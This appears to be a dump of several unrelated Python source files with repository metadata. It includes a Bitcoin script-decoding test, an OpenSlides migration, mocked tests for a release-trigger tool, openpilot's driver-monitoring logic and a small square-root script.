        tx = '01000000018d1f5635abd06e2c7e2ddf58dc85b3de111e4ad6e0ab51bb0dcf5e84126d927300000000fdfe0000483045022100ae3b4e589dfc9d48cb82d41008dc5fa6a86f94d5c54f9935531924602730ab8002202f88cf464414c4ed9fa11b773c5ee944f66e9b05cc1e51d97abc22ce098937ea01483045022100b44883be035600e9328a01b66c7d8439b74db64187e76b99a68f7893b701d5380220225bf286493e4c4adcf928c40f785422572eb232f84a0b83b0dea823c3a19c75014c695221020743d44be989540d27b1b4bbbcfd17721c337cb6bc9af20eb8a32520b393532f2102c0120a1dda9e51a938d39ddd9fe0ebc45ea97e1d27a7cbd671d5431416d3dd87210213820eb3d5f509d7438c9eeecb4157b2f595105e7cd564b3cdbb9ead3da41eed53aeffffffff02611e0000000000001976a914301102070101010101010102060101010101010188acee2a02000000000017a91430110207010101010101010206010101010101018700000000'
        rpc_result = self.nodes[0].decoderawtransaction(tx)
        assert_equal('OP_DUP OP_HASH160 3011020701010101010101020601010101010101 OP_EQUALVERIFY OP_CHECKSIG', rpc_result['vout'][0]['scriptPubKey']['asm'])
        assert_equal('OP_HASH160 3011020701010101010101020601010101010101 OP_EQUAL', rpc_result['vout'][1]['scriptPubKey']['asm'])

        # some more full transaction tests of varying specific scriptSigs. used instead of
        # tests in decodescript_script_sig because the decodescript RPC is specifically
        # for working on scriptPubKeys (argh!).
        push_signature = bytes_to_hex_str(txSave.vin[0].scriptSig)[2:(0x48*2+4)]
        signature = push_signature[2:]
        der_signature = signature[:-2]
        signature_sighash_decoded = der_signature + '[ALL]'
        signature_2 = der_signature + '82'
        push_signature_2 = '48' + signature_2
        signature_2_sighash_decoded = der_signature + '[NONE|ANYONECANPAY]'

        # 1) P2PK scriptSig
        txSave.vin[0].scriptSig = hex_str_to_bytes(push_signature)
        rpc_result = self.nodes[0].decoderawtransaction(bytes_to_hex_str(txSave.serialize()))
        assert_equal(signature_sighash_decoded, rpc_result['vin'][0]['scriptSig']['asm'])

        # make sure that the sighash decodes come out correctly for a more complex / lesser used case.
        txSave.vin[0].scriptSig = hex_str_to_bytes(push_signature_2)
        rpc_result = self.nodes[0].decoderawtransaction(bytes_to_hex_str(txSave.serialize()))
        assert_equal(signature_2_sighash_decoded, rpc_result['vin'][0]['scriptSig']['asm'])

        # 2) multisig scriptSig
        txSave.vin[0].scriptSig = hex_str_to_bytes('00' + push_signature + push_signature_2)
        rpc_result = self.nodes[0].decoderawtransaction(bytes_to_hex_str(txSave.serialize()))
        assert_equal('0 ' + signature_sighash_decoded + ' ' + signature_2_sighash_decoded, rpc_result['vin'][0]['scriptSig']['asm'])

        # 3) test a scriptSig that contains more than push operations.
        # in fact, it contains an OP_RETURN with data specially crafted to cause improper decode if the code does not catch it.
        txSave.vin[0].scriptSig = hex_str_to_bytes('6a143011020701010101010101020601010101010101')
        rpc_result = self.nodes[0].decoderawtransaction(bytes_to_hex_str(txSave.serialize()))
        assert_equal('OP_RETURN 3011020701010101010101020601010101010101', rpc_result['vin'][0]['scriptSig']['asm'])

    def run_test(self):
        self.decodescript_script_sig()
        self.decodescript_script_pub_key()
        self.decoderawtransaction_asm_sighashtype()
# Entry point when the test file is run directly by the functional test runner.
if __name__ == '__main__':
    DecodeScriptTest().main()
| 71.32766
| 761
| 0.76053
|
4a0237c9a5ae7f868e4d954b83cdaac9226adde8
| 505
|
py
|
Python
|
server/openslides/motions/migrations/0042_motionpoll_change_fields_2.py
|
squeakyflamingo/dlrgjugend-OpenSlides
|
4de9e140fe51b01b471dfc98ef3061617424acf8
|
[
"MIT"
] | null | null | null |
server/openslides/motions/migrations/0042_motionpoll_change_fields_2.py
|
squeakyflamingo/dlrgjugend-OpenSlides
|
4de9e140fe51b01b471dfc98ef3061617424acf8
|
[
"MIT"
] | 1
|
2021-04-24T18:11:26.000Z
|
2021-04-24T18:11:26.000Z
|
server/openslides/motions/migrations/0042_motionpoll_change_fields_2.py
|
DLRG-Jugend-NDS/OpenSlides
|
03704e4852821ccd67fe23adb6e2c38b67d93732
|
[
"MIT"
] | null | null | null |
# Generated by jsangmeister on 2021-03-22 12:44
from django.db import migrations
from ...poll.migrations.poll_migration_helper import (
calculate_vote_fields,
set_is_pseudoanonymized,
)
class Migration(migrations.Migration):
    # Backfills MotionPoll fields (pseudoanonymization flag and vote totals)
    # added by migration 0041, using the shared poll migration helpers.

    dependencies = [
        ("motions", "0041_motionpoll_change_fields_1"),
    ]

    operations = [
        migrations.RunPython(set_is_pseudoanonymized("motions", "MotionPoll")),
        migrations.RunPython(calculate_vote_fields("motions", "MotionPoll")),
    ]
| 24.047619
| 79
| 0.718812
|
4a0237d28deff262bfc369fb4248b28cfcf419fc
| 10,221
|
py
|
Python
|
tests/test_autorelease_trigger.py
|
dazuma/releasetool
|
c1ca9218f5c28734c3eb03c01ef4fd78d8b61a01
|
[
"Apache-2.0"
] | 23
|
2018-10-09T15:14:21.000Z
|
2022-01-24T12:18:57.000Z
|
tests/test_autorelease_trigger.py
|
dazuma/releasetool
|
c1ca9218f5c28734c3eb03c01ef4fd78d8b61a01
|
[
"Apache-2.0"
] | 160
|
2018-09-21T22:16:02.000Z
|
2022-03-30T21:51:35.000Z
|
tests/test_autorelease_trigger.py
|
dazuma/releasetool
|
c1ca9218f5c28734c3eb03c01ef4fd78d8b61a01
|
[
"Apache-2.0"
] | 19
|
2018-10-08T20:39:39.000Z
|
2021-07-28T15:17:14.000Z
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest.mock import patch, Mock
from autorelease import trigger
@patch("autorelease.trigger.trigger_kokoro_build_for_pull_request")
@patch("autorelease.github.GitHub.list_org_issues")
@patch("autorelease.kokoro.make_authorized_session")
def test_no_issues(
    make_authorized_session, list_org_issues, trigger_kokoro_build_for_pull_request
):
    # With no tagged release PRs, a Kokoro session is still created but no
    # build is triggered.
    list_org_issues.return_value = []
    trigger.main("github-token", "kokoro-credentials")
    make_authorized_session.assert_called_once()
    trigger_kokoro_build_for_pull_request.assert_not_called()
@patch("autorelease.trigger.trigger_kokoro_build_for_pull_request")
@patch("autorelease.github.GitHub.list_org_issues")
@patch("autorelease.kokoro.make_adc_session")
def test_adc(make_adc_session, list_org_issues, trigger_kokoro_build_for_pull_request):
    # When no Kokoro credentials are given, Application Default Credentials
    # are used to create the session.
    list_org_issues.return_value = []
    trigger.main("github-token", None)
    make_adc_session.assert_called_once()
    trigger_kokoro_build_for_pull_request.assert_not_called()
@patch("autorelease.trigger.trigger_kokoro_build_for_pull_request")
@patch("autorelease.github.GitHub.list_org_issues")
@patch("autorelease.kokoro.make_authorized_session")
def test_processes_issues(
    make_authorized_session, list_org_issues, trigger_kokoro_build_for_pull_request
):
    # Two tagged release PRs are returned: both orgs are queried and one
    # Kokoro build is attempted per PR.
    pr1 = {
        "base": {"ref": "abc123", "repo": {"full_name": "googleapis/java-asset"}},
        "pull_request": {"html_url": "https://github.com/googleapis/java-asset"},
        "title": "chore: release 1.2.3",
    }
    pr2 = {
        "base": {"ref": "def456", "repo": {"full_name": "googleapis/nodejs-container"}},
        "pull_request": {"html_url": "https://github.com/nodejs/java-container"},
        "title": "chore: release 1.0.0",
    }
    list_org_issues.side_effect = [[pr1, pr2]]

    trigger.main("github-token", "kokoro-credentials")

    list_org_issues.assert_any_call(
        org="googleapis",
        state="closed",
        labels="autorelease: tagged",
        created_after="2021-04-01",
    )
    list_org_issues.assert_any_call(
        org="GoogleCloudPlatform",
        state="closed",
        labels="autorelease: tagged",
        created_after="2021-04-01",
    )
    assert trigger_kokoro_build_for_pull_request.call_count == 2
@patch("autorelease.kokoro.trigger_build")
def test_trigger_kokoro_build_for_pull_request_skips_non_merged(trigger_build):
    # A closed-but-unmerged PR gets its labels updated but no Kokoro build.
    github = Mock()
    github.update_pull_labels = Mock()
    github.get_url.return_value = {
        "merged_at": None,
        "base": {"repo": {"full_name": "googleapis/java-asset"}},
    }
    issue = {
        "pull_request": {"url": "https://api.github.com/googleapis/java-asset/pull/5"}
    }
    trigger.trigger_kokoro_build_for_pull_request(Mock(), github, issue, Mock())
    github.update_pull_labels.assert_called_once()
    trigger_build.assert_not_called()
@patch("autorelease.trigger.LANGUAGE_ALLOWLIST", ["java"])
@patch("autorelease.kokoro.trigger_build")
def test_trigger_kokoro_build_for_pull_request_triggers_kokoro(trigger_build):
    # A merged PR in an allowlisted language triggers a build and a label update.
    github = Mock()
    github.get_url.return_value = {
        "merged_at": "2021-01-01T09:00:00.000Z",
        "merge_commit_sha": "abcd1234",
        "base": {"repo": {"full_name": "googleapis/java-asset"}},
        "html_url": "https://github.com/googleapis/java-asset/pulls/5",
    }
    issue = {
        "pull_request": {"url": "https://api.github.com/googleapis/java-asset/pull/5"},
        "merged_at": "2021-01-01T09:00:00.000Z",
    }
    trigger.trigger_kokoro_build_for_pull_request(Mock(), github, issue, Mock())
    trigger_build.assert_called_once()
    github.update_pull_labels.assert_called_once()
@patch("autorelease.trigger.LANGUAGE_ALLOWLIST", [])
@patch("autorelease.kokoro.trigger_build")
def test_trigger_kokoro_build_for_pull_request_skips_kokoro_if_not_in_allowlist(
    trigger_build,
):
    # With an empty language allowlist, no build is triggered even for a merged PR.
    github = Mock()
    github.get_url.return_value = {
        "merged_at": "2021-01-01T09:00:00.000Z",
        "merge_commit_sha": "abcd1234",
        "base": {"repo": {"full_name": "googleapis/java-asset"}},
        "html_url": "https://github.com/googleapis/java-asset/pulls/5",
    }
    issue = {
        "pull_request": {"url": "https://api.github.com/googleapis/java-asset/pull/5"},
        "merged_at": "2021-01-01T09:00:00.000Z",
    }
    trigger.trigger_kokoro_build_for_pull_request(Mock(), github, issue, Mock())
    trigger_build.assert_not_called()
@patch("autorelease.trigger.LANGUAGE_ALLOWLIST", ["php"])
@patch("autorelease.kokoro.trigger_build")
def test_trigger_kokoro_build_for_pull_request_skips_kokoro_if_no_job_name(
    trigger_build,
):
    # A repo with no mapped Kokoro job name must not trigger a build.
    github = Mock()
    github.get_url.return_value = {
        "merged_at": "2021-01-01T09:00:00.000Z",
        "base": {"repo": {"full_name": "googleapis/google-cloud-php"}},
        "html_url": "https://github.com/googleapis/google-cloud-php/pulls/5",
    }
    issue = {
        "pull_request": {
            "url": "https://api.github.com/googleapis/google-cloud-php/pull/5"
        },
        "merged_at": "2021-01-01T09:00:00.000Z",
    }
    trigger.trigger_kokoro_build_for_pull_request(Mock(), github, issue, Mock())
    trigger_build.assert_not_called()
@patch("autorelease.trigger.LANGUAGE_ALLOWLIST", ["php"])
@patch("autorelease.kokoro.trigger_build")
def test_trigger_kokoro_build_for_pull_request_skips_kokoro_if_already_triggered(
    trigger_build,
):
    """A PR already carrying the 'autorelease: triggered' label is skipped."""
    already_triggered = {
        "merged_at": "2021-01-01T09:00:00.000Z",
        "base": {"repo": {"full_name": "googleapis/google-cloud-php"}},
        "html_url": "https://github.com/googleapis/google-cloud-php/pulls/5",
        "labels": [{"id": 12345, "name": "autorelease: triggered"}],
    }
    gh = Mock()
    gh.get_url.return_value = already_triggered
    issue = {
        "pull_request": {
            "url": "https://api.github.com/googleapis/google-cloud-php/pull/5"
        },
        "merged_at": "2021-01-01T09:00:00.000Z",
    }

    trigger.trigger_kokoro_build_for_pull_request(Mock(), gh, issue, Mock())

    trigger_build.assert_not_called()
@patch("autorelease.trigger.LANGUAGE_ALLOWLIST", ["java"])
@patch("autorelease.kokoro.make_authorized_session")
@patch("autorelease.github.GitHub.get_issue")
@patch("autorelease.github.GitHub.get_url")
@patch("autorelease.github.GitHub.update_pull_labels")
@patch("autorelease.kokoro.trigger_build")
def test_trigger_single(
    trigger_build, update_pull_labels, get_url, get_issue, make_authorized_session
):
    """trigger_single stages a release build for a tagged, merged Java PR."""
    session = Mock()
    make_authorized_session.return_value = session
    get_issue.return_value = {
        "title": "chore: release 1.2.3",
        "pull_request": {
            "html_url": "https://github.com/googleapis/java-trace/pull/1234",
            "url": "https://api.github.com/repos/googleapis/java-trace/pulls/1234",
        },
    }
    get_url.return_value = {
        "merged_at": "2021-07-20T09:00:00.123Z",
        "base": {"repo": {"full_name": "googleapis/java-trace"}},
        "html_url": "https://github.com/googleapis/java-trace/pull/1234",
        "merge_commit_sha": "abcd1234",
        "labels": [{"id": 12345, "name": "autorelease: tagged"}],
    }

    reporter = trigger.trigger_single(
        "fake-github-token",
        "fake-kokoro-credentials",
        "https://github.com/googleapis/java-trace/pull/1234",
    )

    assert len(reporter.results) == 1
    # The build must target the merge commit of the release PR.
    trigger_build.assert_called_with(
        session,
        job_name="cloud-devrel/client-libraries/java/java-trace/release/stage",
        sha="abcd1234",
        env_vars={
            "AUTORELEASE_PR": "https://github.com/googleapis/java-trace/pull/1234"
        },
    )
    update_pull_labels.assert_not_called()
@patch("autorelease.kokoro.make_authorized_session")
@patch("autorelease.kokoro.trigger_build")
def test_trigger_single_bad_url(trigger_build, make_authorized_session):
    """An issues/ URL (not a pull URL) yields one report entry and no build."""
    make_authorized_session.return_value = Mock()

    reporter = trigger.trigger_single(
        "fake-github-token",
        "fake-kokoro-credentials",
        "https://github.com/googleapis/java-trace/issues/1234",
    )

    assert len(reporter.results) == 1
    trigger_build.assert_not_called()
@patch("autorelease.kokoro.make_authorized_session")
@patch("autorelease.github.GitHub.get_issue")
@patch("autorelease.github.GitHub.get_url")
@patch("autorelease.github.GitHub.update_pull_labels")
@patch("autorelease.kokoro.trigger_build")
def test_trigger_single_skips_already_triggered(
    trigger_build, update_pull_labels, get_url, get_issue, make_authorized_session
):
    """trigger_single skips PRs that already carry 'autorelease: triggered'."""
    session = Mock()
    make_authorized_session.return_value = session
    get_issue.return_value = {
        "title": "chore: release 1.2.3",
        "pull_request": {
            "html_url": "https://github.com/googleapis/java-trace/pull/1234",
            "url": "https://api.github.com/repos/googleapis/java-trace/pulls/1234",
        },
    }
    # Same PR as the happy path, but with the 'triggered' label already applied.
    get_url.return_value = {
        "merged_at": "2021-07-20T09:00:00.123Z",
        "base": {"repo": {"full_name": "googleapis/java-trace"}},
        "html_url": "https://github.com/googleapis/java-trace/pull/1234",
        "merge_commit_sha": "abcd1234",
        "labels": [
            {"id": 12345, "name": "autorelease: tagged"},
            {"id": 12346, "name": "autorelease: triggered"},
        ],
    }

    reporter = trigger.trigger_single(
        "fake-github-token",
        "fake-kokoro-credentials",
        "https://github.com/googleapis/java-trace/pull/1234",
    )

    assert len(reporter.results) == 1
    trigger_build.assert_not_called()
| 37.996283
| 88
| 0.695724
|
4a0238aa2d561f9a2c14028fa15795f9b76a23c0
| 9,285
|
py
|
Python
|
selfdrive/controls/lib/driver_monitor.py
|
J7orWV8P9/openpilot
|
24e83ea06121598d6f6aa6e37c53161aae141b4c
|
[
"MIT"
] | null | null | null |
selfdrive/controls/lib/driver_monitor.py
|
J7orWV8P9/openpilot
|
24e83ea06121598d6f6aa6e37c53161aae141b4c
|
[
"MIT"
] | null | null | null |
selfdrive/controls/lib/driver_monitor.py
|
J7orWV8P9/openpilot
|
24e83ea06121598d6f6aa6e37c53161aae141b4c
|
[
"MIT"
] | null | null | null |
import numpy as np
from common.realtime import DT_CTRL, DT_DMON
from selfdrive.controls.lib.drive_helpers import create_event, EventTypes as ET
from common.filter_simple import FirstOrderFilter
from common.stat_live import RunningStatFilter
# Tuning constants for driver monitoring. Times are in seconds unless noted.
_AWARENESS_TIME = 600.  # 10 minute limit without user touching steering wheel before the car enters a terminal status
_AWARENESS_PRE_TIME_TILL_TERMINAL = 25.  # a first alert is issued 25s before expiration
_AWARENESS_PROMPT_TIME_TILL_TERMINAL = 15.  # a second alert is issued 15s before start decelerating the car
_DISTRACTED_TIME = 300.  # active-monitoring budget while the driver looks distracted
_DISTRACTED_PRE_TIME_TILL_TERMINAL = 10.
_DISTRACTED_PROMPT_TIME_TILL_TERMINAL = 6.
_FACE_THRESHOLD = 0.4  # min faceProb to count as a detected face
_EYE_THRESHOLD = 0.4  # min eyeProb before a blink probability is trusted
_BLINK_THRESHOLD = 0.5  # 0.225
_PITCH_WEIGHT = 1.30  # 1.5 # pitch matters a lot more
_METRIC_THRESHOLD = 0.4  # combined pose error above which pose is "bad"
_PITCH_POS_ALLOWANCE = 0.04  # 0.08 # rad, to not be too sensitive on positive pitch
_PITCH_NATURAL_OFFSET = 0.13  # 0.1 # people don't seem to look straight when they drive relaxed, rather a bit up
_YAW_NATURAL_OFFSET = 0.08  # people don't seem to look straight when they drive relaxed, rather a bit to the right (center of car)
_DISTRACTED_FILTER_TS = 0.25  # 0.6Hz
_POSE_CALIB_MIN_SPEED = 13  # 30 mph
_POSE_OFFSET_MIN_COUNT = 600  # valid data counts before calibration completes, 1 seg is 600 counts
_POSE_OFFSET_MAX_COUNT = 3600  # stop deweighting new data after 6 min, aka "short term memory"
_RECOVERY_FACTOR_MAX = 5.  # relative to minus step change
_RECOVERY_FACTOR_MIN = 1.25  # relative to minus step change
MAX_TERMINAL_ALERTS = 3  # not allowed to engage after 3 terminal alerts
# model output refers to center of cropped image, so need to apply the x displacement offset
RESIZED_FOCAL = 320.0
H, W, FULL_W = 320, 160, 426  # crop height, crop width, full frame width (pixels)
class DistractedType():
  """Reasons a driver can be judged distracted (plain int constants)."""
  NOT_DISTRACTED = 0  # attentive
  BAD_POSE = 1        # head pose too far from the (calibrated) baseline
  BAD_BLINK = 2       # eyes judged closed
def head_orientation_from_descriptor(angles_desc, pos_desc, rpy_calib):
  """Convert model head-pose descriptors to device-frame [roll, pitch, yaw].

  From the driver's perspective pitch is up and yaw is right.  Pitch and yaw
  are corrected for where the face sits in the frame (focal-plane angle) and
  for the rig calibration; roll is left uncalibrated.
  """
  pitch_net = angles_desc[0]
  yaw_net = angles_desc[1]
  roll_net = angles_desc[2]

  # pixel position of the face in the full (uncropped) frame
  face_px = ((pos_desc[0] + .5)*W - W + FULL_W, (pos_desc[1]+.5)*H)
  # angular offset of that pixel from the frame center
  yaw_focal_angle = np.arctan2(face_px[0] - FULL_W//2, RESIZED_FOCAL)
  pitch_focal_angle = np.arctan2(face_px[1] - H//2, RESIZED_FOCAL)

  roll = roll_net
  pitch = pitch_net + pitch_focal_angle
  yaw = -yaw_net + yaw_focal_angle

  # apply calibration (no calib for roll)
  pitch -= rpy_calib[1]
  yaw -= rpy_calib[2]
  return np.array([roll, pitch, yaw])
class DriverPose():
  """Most recent head pose plus running stats used for gaze calibration."""
  def __init__(self):
    # device-frame angles, initialized to zero
    self.roll = 0.
    self.pitch = 0.
    self.yaw = 0.
    # long-lived filters that learn this driver's relaxed gaze offsets
    self.pitch_offseter = RunningStatFilter(max_trackable=_POSE_OFFSET_MAX_COUNT)
    self.yaw_offseter = RunningStatFilter(max_trackable=_POSE_OFFSET_MAX_COUNT)
class DriverBlink():
  """Per-eye blink probabilities (gated by eye visibility upstream)."""
  def __init__(self):
    self.right_blink = 0.
    self.left_blink = 0.
class DriverStatus():
  """Driver-awareness state machine.

  Tracks an awareness score in [-0.1, 1] that decays while the driver is
  distracted (or no face is seen) and recovers while they pay attention.
  Crossing the pre/prompt/terminal thresholds emits escalating events in
  update().  Two monitoring modes exist: active (face visible, distraction
  timers) and passive (no face, longer awareness timers); each keeps its
  own saved awareness value so switching modes does not cause false alerts.
  """
  def __init__(self):
    self.pose = DriverPose()
    # calibrated once both offseters have seen enough valid samples
    self.pose_calibrated = self.pose.pitch_offseter.filtered_stat.n > _POSE_OFFSET_MIN_COUNT and \
                           self.pose.yaw_offseter.filtered_stat.n > _POSE_OFFSET_MIN_COUNT
    self.blink = DriverBlink()
    # awareness: currently active score; the _active/_passive copies hold the
    # saved score for the mode that is not currently in effect
    self.awareness = 1.
    self.awareness_active = 1.
    self.awareness_passive = 1.
    self.driver_distracted = False
    # low-pass filter over the boolean distraction signal (0.6 Hz)
    self.driver_distraction_filter = FirstOrderFilter(0., _DISTRACTED_FILTER_TS, DT_DMON)
    self.face_detected = False
    self.terminal_alert_cnt = 0  # counts red alerts; compared against MAX_TERMINAL_ALERTS elsewhere
    self.step_change = 0.        # per-control-step awareness decay
    self.active_monitoring_mode = True
    self.threshold_prompt = _DISTRACTED_PROMPT_TIME_TILL_TERMINAL / _DISTRACTED_TIME
    self.is_rhd_region = False          # right-hand-drive region disables face-based monitoring
    self.is_rhd_region_checked = False
    self._set_timers(active_monitoring=True)

  def _set_timers(self, active_monitoring):
    """Select decay rate and alert thresholds for the given monitoring mode.

    Once the prompt (orange) threshold has been crossed in active mode, the
    timers are frozen so losing the face cannot be exploited to pause decay.
    """
    if self.active_monitoring_mode and self.awareness <= self.threshold_prompt:
      if active_monitoring:
        self.step_change = DT_CTRL / _DISTRACTED_TIME
      else:
        self.step_change = 0.
      return  # no exploit after orange alert
    elif self.awareness <= 0.:
      # terminal state: leave everything as-is until reset
      return

    if active_monitoring:
      # when falling back from passive mode to active mode, reset awareness to avoid false alert
      if not self.active_monitoring_mode:
        self.awareness_passive = self.awareness
        self.awareness = self.awareness_active
      self.threshold_pre = _DISTRACTED_PRE_TIME_TILL_TERMINAL / _DISTRACTED_TIME
      self.threshold_prompt = _DISTRACTED_PROMPT_TIME_TILL_TERMINAL / _DISTRACTED_TIME
      self.step_change = DT_CTRL / _DISTRACTED_TIME
      self.active_monitoring_mode = True
    else:
      # switching to passive mode: save active score, restore passive score
      if self.active_monitoring_mode:
        self.awareness_active = self.awareness
        self.awareness = self.awareness_passive
      self.threshold_pre = _AWARENESS_PRE_TIME_TILL_TERMINAL / _AWARENESS_TIME
      self.threshold_prompt = _AWARENESS_PROMPT_TIME_TILL_TERMINAL / _AWARENESS_TIME
      self.step_change = DT_CTRL / _AWARENESS_TIME
      self.active_monitoring_mode = False

  def _is_driver_distracted(self, pose, blink):
    """Classify the current pose/blink sample as a DistractedType value.

    Before calibration completes, fixed natural-gaze offsets are used;
    afterwards the learned per-driver means are subtracted instead.
    """
    if not self.pose_calibrated:
      pitch_error = pose.pitch - _PITCH_NATURAL_OFFSET
      yaw_error = pose.yaw - _YAW_NATURAL_OFFSET
      # add positive pitch allowance
      if pitch_error > 0.:
        pitch_error = max(pitch_error - _PITCH_POS_ALLOWANCE, 0.)
    else:
      pitch_error = pose.pitch - self.pose.pitch_offseter.filtered_stat.mean()
      yaw_error = pose.yaw - self.pose.yaw_offseter.filtered_stat.mean()

    # pitch deviations matter more than yaw (see _PITCH_WEIGHT)
    pitch_error *= _PITCH_WEIGHT
    pose_metric = np.sqrt(yaw_error**2 + pitch_error**2)

    if pose_metric > _METRIC_THRESHOLD:
      return DistractedType.BAD_POSE
    elif (blink.left_blink + blink.right_blink)*0.5 > _BLINK_THRESHOLD:
      return DistractedType.BAD_BLINK
    else:
      return DistractedType.NOT_DISTRACTED

  def get_pose(self, driver_monitoring, cal_rpy, car_speed, op_engaged):
    """Ingest one driverMonitoring model message (10 Hz) and update state.

    Updates pose, blink, face detection, the filtered distraction signal,
    the gaze-offset calibration (only while the human drives above
    _POSE_CALIB_MIN_SPEED), and finally the mode timers.
    """
    # 10 Hz
    if len(driver_monitoring.faceOrientation) == 0 or len(driver_monitoring.facePosition) == 0:
      return

    self.pose.roll, self.pose.pitch, self.pose.yaw = head_orientation_from_descriptor(driver_monitoring.faceOrientation, driver_monitoring.facePosition, cal_rpy)
    # blink probabilities only count when the eye itself is confidently seen
    self.blink.left_blink = driver_monitoring.leftBlinkProb * (driver_monitoring.leftEyeProb>_EYE_THRESHOLD)
    self.blink.right_blink = driver_monitoring.rightBlinkProb * (driver_monitoring.rightEyeProb>_EYE_THRESHOLD)
    self.face_detected = driver_monitoring.faceProb > _FACE_THRESHOLD and not self.is_rhd_region

    self.driver_distracted = self._is_driver_distracted(self.pose, self.blink)>0
    # first order filters
    self.driver_distraction_filter.update(self.driver_distracted)

    # update offseter
    # only update when driver is actively driving the car above a certain speed
    if self.face_detected and car_speed>_POSE_CALIB_MIN_SPEED and not op_engaged:
      self.pose.pitch_offseter.push_and_update(self.pose.pitch)
      self.pose.yaw_offseter.push_and_update(self.pose.yaw)
      self.pose_calibrated = self.pose.pitch_offseter.filtered_stat.n > _POSE_OFFSET_MIN_COUNT and \
                             self.pose.yaw_offseter.filtered_stat.n > _POSE_OFFSET_MIN_COUNT

    self._set_timers(self.face_detected)

  def update(self, events, driver_engaged, ctrl_active, standstill):
    """Advance the awareness score one control step and append alert events.

    Returns the (possibly extended) events list.  Awareness fully resets on
    driver interaction (unless already terminal) or when control is inactive.
    """
    if (driver_engaged and self.awareness > 0) or not ctrl_active:
      # reset only when on disengagement if red reached
      self.awareness = 1.
      self.awareness_active = 1.
      self.awareness_passive = 1.
      return events

    driver_attentive = self.driver_distraction_filter.x < 0.37
    awareness_prev = self.awareness

    if (driver_attentive and self.face_detected and self.awareness > 0):
      # only restore awareness when paying attention and alert is not red
      # recovery is faster the lower the awareness (factor scales between min and max)
      self.awareness = min(self.awareness + ((_RECOVERY_FACTOR_MAX-_RECOVERY_FACTOR_MIN)*(1.-self.awareness)+_RECOVERY_FACTOR_MIN)*self.step_change, 1.)
      if self.awareness == 1.:
        self.awareness_passive = min(self.awareness_passive + self.step_change, 1.)
      # don't display alert banner when awareness is recovering and has cleared orange
      if self.awareness > self.threshold_prompt:
        return events

    # should always be counting if distracted unless at standstill and reaching orange
    if (not self.face_detected or (self.driver_distraction_filter.x > 0.63 and self.driver_distracted and self.face_detected)) and \
       not (standstill and self.awareness - self.step_change <= self.threshold_prompt):
      # floor at -0.1 gives a small hysteresis band below terminal
      self.awareness = max(self.awareness - self.step_change, -0.1)

    alert = None
    if self.awareness <= 0.:
      # terminal red alert: disengagement required
      alert = 'driverDistracted' if self.active_monitoring_mode else 'driverUnresponsive'
      if awareness_prev > 0.:
        # count each crossing into terminal exactly once
        self.terminal_alert_cnt += 1
    elif self.awareness <= self.threshold_prompt:
      # prompt orange alert
      alert = 'promptDriverDistracted' if self.active_monitoring_mode else 'promptDriverUnresponsive'
    elif self.awareness <= self.threshold_pre:
      # pre green alert
      alert = 'preDriverDistracted' if self.active_monitoring_mode else 'preDriverUnresponsive'

    if alert is not None:
      events.append(create_event(alert, [ET.WARNING]))

    return events
| 42.788018
| 161
| 0.746688
|
4a023ba726ae0536550a5aa234c4a270c439bd04
| 27
|
py
|
Python
|
Calculator/Squareroot.py
|
Wve-program/IndividualCalculator
|
5b57b2f873c0ca36bb909490d16b147ce2e00d08
|
[
"MIT"
] | null | null | null |
Calculator/Squareroot.py
|
Wve-program/IndividualCalculator
|
5b57b2f873c0ca36bb909490d16b147ce2e00d08
|
[
"MIT"
] | null | null | null |
Calculator/Squareroot.py
|
Wve-program/IndividualCalculator
|
5b57b2f873c0ca36bb909490d16b147ce2e00d08
|
[
"MIT"
] | null | null | null |
import math


def square_root(x):
    """Return the non-negative square root of x.

    Args:
        x: a non-negative number.

    Returns:
        float: math.sqrt(x).

    Raises:
        ValueError: if x is negative (propagated from math.sqrt).
    """
    return math.sqrt(x)


if __name__ == "__main__":
    # Bug fix: the original script evaluated `math.sqrt( x )` with an
    # undefined name `x`, raising NameError on every run.  Read the operand
    # from the user instead, matching the calculator-script context.
    print(square_root(float(input("Enter a number: "))))
| 9
| 14
| 0.703704
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.